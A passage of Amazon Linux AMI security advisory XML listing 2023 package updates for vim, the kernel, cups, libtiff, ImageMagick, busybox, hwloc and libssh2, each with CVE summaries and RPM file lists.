A broken cryptographic algorithm flaw was found in golang.org/x/crypto/ssh. This issue causes a client to fail authentification with RSA keys to servers that reject signature algorithms based on SHA-2, enabling an attacker to crash the server, resulting in a loss of availability.
CVE-2021-43565:
The x/crypto/ssh package before 0.0.0-20211202192323-5770296d904e of golang.org/x/crypto allows an attacker to panic an SSH server.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-43565" title="" id="CVE-2021-43565" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-27191" title="" id="CVE-2022-27191" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-27664" title="" id="CVE-2022-27664" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-41723" title="" id="CVE-2022-41723" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="amazon-ssm-agent" version="3.2.1377.0" release="1.amzn1" epoch="0" arch="x86_64"><filename>Packages/amazon-ssm-agent-3.2.1377.0-1.amzn1.x86_64.rpm</filename></package><package name="amazon-ssm-agent-debuginfo" version="3.2.1377.0" release="1.amzn1" epoch="0" arch="x86_64"><filename>Packages/amazon-ssm-agent-debuginfo-3.2.1377.0-1.amzn1.x86_64.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2023-1826</id><title>Amazon Linux AMI 2014.03 - ALAS-2023-1826: important priority package update for vim</title><issued date="2023-09-13 23:15:00" /><updated date="2023-09-25 20:12:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2023-4781:
Heap-based Buffer Overflow in GitHub repository vim/vim prior to 9.0.1873.
CVE-2023-4751:
Heap-based Buffer Overflow in GitHub repository vim/vim prior to 9.0.1331.
CVE-2023-4738:
Heap-based Buffer Overflow in GitHub repository vim/vim prior to 9.0.1848.
CVE-2023-4735:
Out-of-bounds Write in GitHub repository vim/vim prior to 9.0.1847.
CVE-2023-4734:
Integer Overflow or Wraparound in GitHub repository vim/vim prior to 9.0.1846.
CVE-2021-3236:
vim 8.2.2348 is affected by null pointer dereference, allows local attackers to cause a denial of service (DoS) via the ex_buffer_all method.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-3236" title="" id="CVE-2021-3236" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-4734" title="" id="CVE-2023-4734" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-4735" title="" id="CVE-2023-4735" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-4738" title="" id="CVE-2023-4738" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-4751" title="" id="CVE-2023-4751" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-4781" title="" id="CVE-2023-4781" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="vim-filesystem" version="9.0.1712" release="1.82.amzn1" epoch="2" arch="noarch"><filename>Packages/vim-filesystem-9.0.1712-1.82.amzn1.noarch.rpm</filename></package><package name="vim-common" version="9.0.1712" release="1.82.amzn1" epoch="2" arch="x86_64"><filename>Packages/vim-common-9.0.1712-1.82.amzn1.x86_64.rpm</filename></package><package name="vim-data" version="9.0.1712" release="1.82.amzn1" epoch="2" arch="noarch"><filename>Packages/vim-data-9.0.1712-1.82.amzn1.noarch.rpm</filename></package><package name="vim-debuginfo" version="9.0.1712" release="1.82.amzn1" epoch="2" arch="x86_64"><filename>Packages/vim-debuginfo-9.0.1712-1.82.amzn1.x86_64.rpm</filename></package><package name="vim-minimal" version="9.0.1712" release="1.82.amzn1" epoch="2" arch="x86_64"><filename>Packages/vim-minimal-9.0.1712-1.82.amzn1.x86_64.rpm</filename></package><package name="xxd" version="9.0.1712" release="1.82.amzn1" epoch="2" arch="x86_64"><filename>Packages/xxd-9.0.1712-1.82.amzn1.x86_64.rpm</filename></package><package name="vim-enhanced" version="9.0.1712" release="1.82.amzn1" epoch="2" arch="x86_64"><filename>Packages/vim-enhanced-9.0.1712-1.82.amzn1.x86_64.rpm</filename></package><package name="vim-minimal" version="9.0.1712" release="1.82.amzn1" epoch="2" arch="i686"><filename>Packages/vim-minimal-9.0.1712-1.82.amzn1.i686.rpm</filename></package><package name="vim-debuginfo" version="9.0.1712" release="1.82.amzn1" epoch="2" arch="i686"><filename>Packages/vim-debuginfo-9.0.1712-1.82.amzn1.i686.rpm</filename></package><package name="xxd" version="9.0.1712" release="1.82.amzn1" epoch="2" arch="i686"><filename>Packages/xxd-9.0.1712-1.82.amzn1.i686.rpm</filename></package><package name="vim-enhanced" version="9.0.1712" release="1.82.amzn1" epoch="2" arch="i686"><filename>Packages/vim-enhanced-9.0.1712-1.82.amzn1.i686.rpm</filename></package><package name="vim-common" version="9.0.1712" release="1.82.amzn1" epoch="2" arch="i686"><filename>Packages/vim-common-9.0.1712-1.82.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2023-1827</id><title>Amazon Linux AMI 2014.03 - ALAS-2023-1827: important priority package update for kernel</title><issued date="2023-09-13 23:15:00" /><updated date="2025-02-27 23:43:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2024-0639:
A denial of service vulnerability due to a deadlock was found in sctp_auto_asconf_init in net/sctp/socket.c in the Linux kernel's SCTP subsystem. This flaw allows guests with local user privileges to trigger a deadlock and potentially crash the system.
CVE-2023-52885:
In the Linux kernel, the following vulnerability has been resolved:
SUNRPC: Fix UAF in svc_tcp_listen_data_ready()
CVE-2023-4208:
A use-after-free vulnerability in the Linux kernel's net/sched: cls_u32 component can be exploited to achieve local privilege escalation.
When u32_change() is called on an existing filter, the whole tcf_result struct is always copied into the new instance of the filter. This causes a problem when updating a filter bound to a class, as tcf_unbind_filter() is always called on the old instance in the success path, decreasing filter_cnt of the still referenced class and allowing it to be deleted, leading to a use-after-free.
We recommend upgrading past commit 3044b16e7c6fe5d24b1cdbcf1bd0a9d92d1ebd81.
CVE-2023-4206:
A use-after-free vulnerability in the Linux kernel's net/sched: cls_route component can be exploited to achieve local privilege escalation.
When route4_change() is called on an existing filter, the whole tcf_result struct is always copied into the new instance of the filter. This causes a problem when updating a filter bound to a class, as tcf_unbind_filter() is always called on the old instance in the success path, decreasing filter_cnt of the still referenced class and allowing it to be deleted, leading to a use-after-free.
We recommend upgrading past commit b80b829e9e2c1b3f7aae34855e04d8f6ecaf13c8.
CVE-2023-4128:
A use-after-free flaw was found in net/sched/cls_fw.c in classifiers (cls_fw, cls_u32, and cls_route) in the Linux Kernel. This flaw allows a local attacker to perform a local privilege escalation due to incorrect handling of the existing filter, leading to a kernel information leak issue.
CVE-2023-34319:
The fix for XSA-423 added logic to Linux'es netback driver to deal with
a frontend splitting a packet in a way such that not all of the headers
would come in one piece. Unfortunately the logic introduced there
didn't account for the extreme case of the entire packet being split
into as many pieces as permitted by the protocol, yet still being
smaller than the area that's specially dealt with to keep all (possible)
headers together. Such an unusual packet would therefore trigger a
buffer overrun in the driver.
CVE-2023-3390:
A use-after-free vulnerability was found in the Linux kernel's netfilter subsystem in net/netfilter/nf_tables_api.c.
Mishandled error handling with NFT_MSG_NEWRULE makes it possible to use a dangling pointer in the same transaction causing a use-after-free vulnerability. This flaw allows a local attacker with user access to cause a privilege escalation issue.
We recommend upgrading past commit 1240eb93f0616b21c675416516ff3d74798fdc97.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-3390" title="" id="CVE-2023-3390" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-34319" title="" id="CVE-2023-34319" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-4128" title="" id="CVE-2023-4128" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-4206" title="" id="CVE-2023-4206" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-4208" title="" id="CVE-2023-4208" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-52885" title="" id="CVE-2023-52885" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-0639" title="" id="CVE-2024-0639" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="kernel-debuginfo-common-x86_64" version="4.14.322" release="170.535.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-debuginfo-common-x86_64-4.14.322-170.535.amzn1.x86_64.rpm</filename></package><package name="kernel-debuginfo" version="4.14.322" release="170.535.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-debuginfo-4.14.322-170.535.amzn1.x86_64.rpm</filename></package><package name="perf-debuginfo" version="4.14.322" release="170.535.amzn1" epoch="0" arch="x86_64"><filename>Packages/perf-debuginfo-4.14.322-170.535.amzn1.x86_64.rpm</filename></package><package name="kernel-devel" version="4.14.322" release="170.535.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-devel-4.14.322-170.535.amzn1.x86_64.rpm</filename></package><package name="perf" version="4.14.322" release="170.535.amzn1" epoch="0" arch="x86_64"><filename>Packages/perf-4.14.322-170.535.amzn1.x86_64.rpm</filename></package><package name="kernel" version="4.14.322" release="170.535.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-4.14.322-170.535.amzn1.x86_64.rpm</filename></package><package name="kernel-headers" version="4.14.322" release="170.535.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-headers-4.14.322-170.535.amzn1.x86_64.rpm</filename></package><package name="kernel-tools" version="4.14.322" release="170.535.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-tools-4.14.322-170.535.amzn1.x86_64.rpm</filename></package><package name="kernel-tools-devel" version="4.14.322" release="170.535.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-tools-devel-4.14.322-170.535.amzn1.x86_64.rpm</filename></package><package name="kernel-tools-debuginfo" version="4.14.322" release="170.535.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-tools-debuginfo-4.14.322-170.535.amzn1.x86_64.rpm</filename></package><package name="perf-debuginfo" version="4.14.322" release="170.535.amzn1" epoch="0" arch="i686"><filename>Packages/perf-debuginfo-4.14.322-170.535.amzn1.i686.rpm</filename></package><package name="kernel-devel" version="4.14.322" release="170.535.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-devel-4.14.322-170.535.amzn1.i686.rpm</filename></package><package name="kernel-tools-debuginfo" version="4.14.322" release="170.535.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-tools-debuginfo-4.14.322-170.535.amzn1.i686.rpm</filename></package><package name="kernel-debuginfo" version="4.14.322" release="170.535.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-debuginfo-4.14.322-170.535.amzn1.i686.rpm</filename></package><package name="kernel-tools-devel" version="4.14.322" release="170.535.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-tools-devel-4.14.322-170.535.amzn1.i686.rpm</filename></package><package name="kernel-debuginfo-common-i686" version="4.14.322" release="170.535.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-debuginfo-common-i686-4.14.322-170.535.amzn1.i686.rpm</filename></package><package name="perf" version="4.14.322" release="170.535.amzn1" epoch="0" arch="i686"><filename>Packages/perf-4.14.322-170.535.amzn1.i686.rpm</filename></package><package name="kernel-tools" version="4.14.322" release="170.535.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-tools-4.14.322-170.535.amzn1.i686.rpm</filename></package><package name="kernel" version="4.14.322" release="170.535.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-4.14.322-170.535.amzn1.i686.rpm</filename></package><package name="kernel-headers" version="4.14.322" release="170.535.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-headers-4.14.322-170.535.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2023-1828</id><title>Amazon Linux AMI 2014.03 - ALAS-2023-1828: medium priority package update for cups</title><issued date="2023-09-13 23:15:00" /><updated date="2023-09-25 20:12:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2023-32360:
An authentication issue was addressed with improved state management. This issue is fixed in macOS Big Sur 11.7.7, macOS Monterey 12.6.6, macOS Ventura 13.4. An unauthenticated user may be able to access recently printed documents.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-32360" title="" id="CVE-2023-32360" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="cups-debuginfo" version="1.4.2" release="67.24.amzn1" epoch="1" arch="x86_64"><filename>Packages/cups-debuginfo-1.4.2-67.24.amzn1.x86_64.rpm</filename></package><package name="cups-devel" version="1.4.2" release="67.24.amzn1" epoch="1" arch="x86_64"><filename>Packages/cups-devel-1.4.2-67.24.amzn1.x86_64.rpm</filename></package><package name="cups-php" version="1.4.2" release="67.24.amzn1" epoch="1" arch="x86_64"><filename>Packages/cups-php-1.4.2-67.24.amzn1.x86_64.rpm</filename></package><package name="cups-libs" version="1.4.2" release="67.24.amzn1" epoch="1" arch="x86_64"><filename>Packages/cups-libs-1.4.2-67.24.amzn1.x86_64.rpm</filename></package><package name="cups-lpd" version="1.4.2" release="67.24.amzn1" epoch="1" arch="x86_64"><filename>Packages/cups-lpd-1.4.2-67.24.amzn1.x86_64.rpm</filename></package><package name="cups" version="1.4.2" release="67.24.amzn1" epoch="1" arch="x86_64"><filename>Packages/cups-1.4.2-67.24.amzn1.x86_64.rpm</filename></package><package name="cups-lpd" version="1.4.2" release="67.24.amzn1" epoch="1" arch="i686"><filename>Packages/cups-lpd-1.4.2-67.24.amzn1.i686.rpm</filename></package><package name="cups-libs" version="1.4.2" release="67.24.amzn1" epoch="1" arch="i686"><filename>Packages/cups-libs-1.4.2-67.24.amzn1.i686.rpm</filename></package><package name="cups-devel" version="1.4.2" release="67.24.amzn1" epoch="1" arch="i686"><filename>Packages/cups-devel-1.4.2-67.24.amzn1.i686.rpm</filename></package><package name="cups-php" version="1.4.2" release="67.24.amzn1" epoch="1" arch="i686"><filename>Packages/cups-php-1.4.2-67.24.amzn1.i686.rpm</filename></package><package name="cups-debuginfo" version="1.4.2" release="67.24.amzn1" epoch="1" arch="i686"><filename>Packages/cups-debuginfo-1.4.2-67.24.amzn1.i686.rpm</filename></package><package name="cups" version="1.4.2" release="67.24.amzn1" epoch="1" arch="i686"><filename>Packages/cups-1.4.2-67.24.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2023-1829</id><title>Amazon Linux AMI 2014.03 - ALAS-2023-1829: medium priority package update for libtiff</title><issued date="2023-09-13 23:15:00" /><updated date="2023-09-25 20:12:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2023-0804:
LibTIFF 4.4.0 has an out-of-bounds write in tiffcrop in tools/tiffcrop.c:3609, allowing attackers to cause a denial-of-service via a crafted tiff file. For users that compile libtiff from sources, the fix is available with commit 33aee127.
CVE-2023-0803:
LibTIFF 4.4.0 has an out-of-bounds write in tiffcrop in tools/tiffcrop.c:3516, allowing attackers to cause a denial-of-service via a crafted tiff file. For users that compile libtiff from sources, the fix is available with commit 33aee127.
CVE-2023-0802:
LibTIFF 4.4.0 has an out-of-bounds write in tiffcrop in tools/tiffcrop.c:3724, allowing attackers to cause a denial-of-service via a crafted tiff file. For users that compile libtiff from sources, the fix is available with commit 33aee127.
CVE-2023-0801:
LibTIFF 4.4.0 has an out-of-bounds write in tiffcrop in libtiff/tif_unix.c:368, invoked by tools/tiffcrop.c:2903 and tools/tiffcrop.c:6778, allowing attackers to cause a denial-of-service via a crafted tiff file. For users that compile libtiff from sources, the fix is available with commit 33aee127.
CVE-2023-0800:
LibTIFF 4.4.0 has an out-of-bounds write in tiffcrop in tools/tiffcrop.c:3502, allowing attackers to cause a denial-of-service via a crafted tiff file. For users that compile libtiff from sources, the fix is available with commit 33aee127.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0800" title="" id="CVE-2023-0800" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0801" title="" id="CVE-2023-0801" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0802" title="" id="CVE-2023-0802" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0803" title="" id="CVE-2023-0803" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0804" title="" id="CVE-2023-0804" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="libtiff-static" version="4.0.3" release="35.44.amzn1" epoch="0" arch="x86_64"><filename>Packages/libtiff-static-4.0.3-35.44.amzn1.x86_64.rpm</filename></package><package name="libtiff-devel" version="4.0.3" release="35.44.amzn1" epoch="0" arch="x86_64"><filename>Packages/libtiff-devel-4.0.3-35.44.amzn1.x86_64.rpm</filename></package><package name="libtiff-debuginfo" version="4.0.3" release="35.44.amzn1" epoch="0" arch="x86_64"><filename>Packages/libtiff-debuginfo-4.0.3-35.44.amzn1.x86_64.rpm</filename></package><package name="libtiff" version="4.0.3" release="35.44.amzn1" epoch="0" arch="x86_64"><filename>Packages/libtiff-4.0.3-35.44.amzn1.x86_64.rpm</filename></package><package name="libtiff-devel" version="4.0.3" release="35.44.amzn1" epoch="0" arch="i686"><filename>Packages/libtiff-devel-4.0.3-35.44.amzn1.i686.rpm</filename></package><package name="libtiff-static" version="4.0.3" release="35.44.amzn1" epoch="0" arch="i686"><filename>Packages/libtiff-static-4.0.3-35.44.amzn1.i686.rpm</filename></package><package name="libtiff" version="4.0.3" release="35.44.amzn1" epoch="0" arch="i686"><filename>Packages/libtiff-4.0.3-35.44.amzn1.i686.rpm</filename></package><package name="libtiff-debuginfo" version="4.0.3" release="35.44.amzn1" epoch="0" arch="i686"><filename>Packages/libtiff-debuginfo-4.0.3-35.44.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2023-1830</id><title>Amazon Linux AMI 2014.03 - ALAS-2023-1830: medium priority package update for libtiff</title><issued date="2023-09-13 23:15:00" /><updated date="2023-09-25 20:12:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2023-0798:
LibTIFF 4.4.0 has an out-of-bounds read in tiffcrop in tools/tiffcrop.c:3400, allowing attackers to cause a denial-of-service via a crafted tiff file. For users that compile libtiff from sources, the fix is available with commit afaabc3e.
CVE-2023-0797:
LibTIFF 4.4.0 has an out-of-bounds read in tiffcrop in libtiff/tif_unix.c:368, invoked by tools/tiffcrop.c:2903 and tools/tiffcrop.c:6921, allowing attackers to cause a denial-of-service via a crafted tiff file. For users that compile libtiff from sources, the fix is available with commit afaabc3e.
CVE-2023-0796:
LibTIFF 4.4.0 has an out-of-bounds read in tiffcrop in tools/tiffcrop.c:3592, allowing attackers to cause a denial-of-service via a crafted tiff file. For users that compile libtiff from sources, the fix is available with commit afaabc3e.
CVE-2023-0795:
LibTIFF 4.4.0 has an out-of-bounds read in tiffcrop in tools/tiffcrop.c:3488, allowing attackers to cause a denial-of-service via a crafted tiff file. For users that compile libtiff from sources, the fix is available with commit afaabc3e.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0795" title="" id="CVE-2023-0795" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0796" title="" id="CVE-2023-0796" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0797" title="" id="CVE-2023-0797" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0798" title="" id="CVE-2023-0798" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="libtiff-devel" version="4.0.3" release="35.45.amzn1" epoch="0" arch="x86_64"><filename>Packages/libtiff-devel-4.0.3-35.45.amzn1.x86_64.rpm</filename></package><package name="libtiff" version="4.0.3" release="35.45.amzn1" epoch="0" arch="x86_64"><filename>Packages/libtiff-4.0.3-35.45.amzn1.x86_64.rpm</filename></package><package name="libtiff-static" version="4.0.3" release="35.45.amzn1" epoch="0" arch="x86_64"><filename>Packages/libtiff-static-4.0.3-35.45.amzn1.x86_64.rpm</filename></package><package name="libtiff-debuginfo" version="4.0.3" release="35.45.amzn1" epoch="0" arch="x86_64"><filename>Packages/libtiff-debuginfo-4.0.3-35.45.amzn1.x86_64.rpm</filename></package><package name="libtiff-static" version="4.0.3" release="35.45.amzn1" epoch="0" arch="i686"><filename>Packages/libtiff-static-4.0.3-35.45.amzn1.i686.rpm</filename></package><package name="libtiff-devel" version="4.0.3" release="35.45.amzn1" epoch="0" arch="i686"><filename>Packages/libtiff-devel-4.0.3-35.45.amzn1.i686.rpm</filename></package><package name="libtiff-debuginfo" version="4.0.3" release="35.45.amzn1" epoch="0" arch="i686"><filename>Packages/libtiff-debuginfo-4.0.3-35.45.amzn1.i686.rpm</filename></package><package name="libtiff" version="4.0.3" release="35.45.amzn1" epoch="0" arch="i686"><filename>Packages/libtiff-4.0.3-35.45.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2023-1831</id><title>Amazon Linux AMI 2014.03 - ALAS-2023-1831: medium priority package update for ImageMagick</title><issued date="2023-09-13 23:15:00" /><updated date="2023-09-25 20:12:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2022-48541:
A memory leak in ImageMagick 7.0.10-45 and 6.9.11-22 allows remote attackers to perform a denial of service via the "identify -help" command.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-48541" title="" id="CVE-2022-48541" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="ImageMagick-perl" version="6.9.10.97" release="1.28.amzn1" epoch="0" arch="x86_64"><filename>Packages/ImageMagick-perl-6.9.10.97-1.28.amzn1.x86_64.rpm</filename></package><package name="ImageMagick-debuginfo" version="6.9.10.97" release="1.28.amzn1" epoch="0" arch="x86_64"><filename>Packages/ImageMagick-debuginfo-6.9.10.97-1.28.amzn1.x86_64.rpm</filename></package><package name="ImageMagick" version="6.9.10.97" release="1.28.amzn1" epoch="0" arch="x86_64"><filename>Packages/ImageMagick-6.9.10.97-1.28.amzn1.x86_64.rpm</filename></package><package name="ImageMagick-c++-devel" version="6.9.10.97" release="1.28.amzn1" epoch="0" arch="x86_64"><filename>Packages/ImageMagick-c++-devel-6.9.10.97-1.28.amzn1.x86_64.rpm</filename></package><package name="ImageMagick-c++" version="6.9.10.97" release="1.28.amzn1" epoch="0" arch="x86_64"><filename>Packages/ImageMagick-c++-6.9.10.97-1.28.amzn1.x86_64.rpm</filename></package><package name="ImageMagick-doc" version="6.9.10.97" release="1.28.amzn1" epoch="0" arch="x86_64"><filename>Packages/ImageMagick-doc-6.9.10.97-1.28.amzn1.x86_64.rpm</filename></package><package name="ImageMagick-devel" version="6.9.10.97" release="1.28.amzn1" epoch="0" arch="x86_64"><filename>Packages/ImageMagick-devel-6.9.10.97-1.28.amzn1.x86_64.rpm</filename></package><package name="ImageMagick-devel" version="6.9.10.97" release="1.28.amzn1" epoch="0" arch="i686"><filename>Packages/ImageMagick-devel-6.9.10.97-1.28.amzn1.i686.rpm</filename></package><package name="ImageMagick-debuginfo" version="6.9.10.97" release="1.28.amzn1" epoch="0" arch="i686"><filename>Packages/ImageMagick-debuginfo-6.9.10.97-1.28.amzn1.i686.rpm</filename></package><package name="ImageMagick" version="6.9.10.97" release="1.28.amzn1" epoch="0" arch="i686"><filename>Packages/ImageMagick-6.9.10.97-1.28.amzn1.i686.rpm</filename></package><package name="ImageMagick-perl" version="6.9.10.97" release="1.28.amzn1" epoch="0" arch="i686"><filename>Packages/ImageMagick-perl-6.9.10.97-1.28.amzn1.i686.rpm</filename></package><package name="ImageMagick-c++" version="6.9.10.97" release="1.28.amzn1" epoch="0" arch="i686"><filename>Packages/ImageMagick-c++-6.9.10.97-1.28.amzn1.i686.rpm</filename></package><package name="ImageMagick-doc" version="6.9.10.97" release="1.28.amzn1" epoch="0" arch="i686"><filename>Packages/ImageMagick-doc-6.9.10.97-1.28.amzn1.i686.rpm</filename></package><package name="ImageMagick-c++-devel" version="6.9.10.97" release="1.28.amzn1" epoch="0" arch="i686"><filename>Packages/ImageMagick-c++-devel-6.9.10.97-1.28.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2023-1832</id><title>Amazon Linux AMI 2014.03 - ALAS-2023-1832: medium priority package update for busybox</title><issued date="2023-09-13 23:15:00" /><updated date="2023-09-25 20:12:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2022-48174:
There is a stack overflow vulnerability in ash.c:6030 in busybox before 1.35. In the environment of Internet of Vehicles, this vulnerability can be executed from command to arbitrary code execution.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-48174" title="" id="CVE-2022-48174" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="busybox" version="1.34.1" release="1.16.amzn1" epoch="1" arch="x86_64"><filename>Packages/busybox-1.34.1-1.16.amzn1.x86_64.rpm</filename></package><package name="busybox-debuginfo" version="1.34.1" release="1.16.amzn1" epoch="1" arch="x86_64"><filename>Packages/busybox-debuginfo-1.34.1-1.16.amzn1.x86_64.rpm</filename></package><package name="busybox-petitboot" version="1.34.1" release="1.16.amzn1" epoch="1" arch="x86_64"><filename>Packages/busybox-petitboot-1.34.1-1.16.amzn1.x86_64.rpm</filename></package><package name="busybox-debuginfo" version="1.34.1" release="1.16.amzn1" epoch="1" arch="i686"><filename>Packages/busybox-debuginfo-1.34.1-1.16.amzn1.i686.rpm</filename></package><package name="busybox-petitboot" version="1.34.1" release="1.16.amzn1" epoch="1" arch="i686"><filename>Packages/busybox-petitboot-1.34.1-1.16.amzn1.i686.rpm</filename></package><package name="busybox" version="1.34.1" release="1.16.amzn1" epoch="1" arch="i686"><filename>Packages/busybox-1.34.1-1.16.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2023-1833</id><title>Amazon Linux AMI 2014.03 - ALAS-2023-1833: medium priority package update for hwloc</title><issued date="2023-09-13 23:15:00" /><updated date="2023-09-25 20:12:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2022-47022:
An issue was discovered in open-mpi hwloc 2.1.0 allows attackers to cause a denial of service or other unspecified impacts via glibc-cpuset in topology-linux.c.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-47022" title="" id="CVE-2022-47022" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="hwloc-devel" version="1.7" release="3.8.amzn1" epoch="0" arch="x86_64"><filename>Packages/hwloc-devel-1.7-3.8.amzn1.x86_64.rpm</filename></package><package name="hwloc-libs" version="1.7" release="3.8.amzn1" epoch="0" arch="x86_64"><filename>Packages/hwloc-libs-1.7-3.8.amzn1.x86_64.rpm</filename></package><package name="hwloc-debuginfo" version="1.7" release="3.8.amzn1" epoch="0" arch="x86_64"><filename>Packages/hwloc-debuginfo-1.7-3.8.amzn1.x86_64.rpm</filename></package><package name="hwloc" version="1.7" release="3.8.amzn1" epoch="0" arch="x86_64"><filename>Packages/hwloc-1.7-3.8.amzn1.x86_64.rpm</filename></package><package name="hwloc-gui" version="1.7" release="3.8.amzn1" epoch="0" arch="x86_64"><filename>Packages/hwloc-gui-1.7-3.8.amzn1.x86_64.rpm</filename></package><package name="hwloc-debuginfo" version="1.7" release="3.8.amzn1" epoch="0" arch="i686"><filename>Packages/hwloc-debuginfo-1.7-3.8.amzn1.i686.rpm</filename></package><package name="hwloc-libs" version="1.7" release="3.8.amzn1" epoch="0" arch="i686"><filename>Packages/hwloc-libs-1.7-3.8.amzn1.i686.rpm</filename></package><package name="hwloc-gui" version="1.7" release="3.8.amzn1" epoch="0" arch="i686"><filename>Packages/hwloc-gui-1.7-3.8.amzn1.i686.rpm</filename></package><package name="hwloc" version="1.7" release="3.8.amzn1" epoch="0" arch="i686"><filename>Packages/hwloc-1.7-3.8.amzn1.i686.rpm</filename></package><package name="hwloc-devel" version="1.7" release="3.8.amzn1" epoch="0" arch="i686"><filename>Packages/hwloc-devel-1.7-3.8.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2023-1834</id><title>Amazon Linux AMI 2014.03 - ALAS-2023-1834: important priority package update for libssh2</title><issued date="2023-09-13 23:15:00" /><updated date="2023-09-25 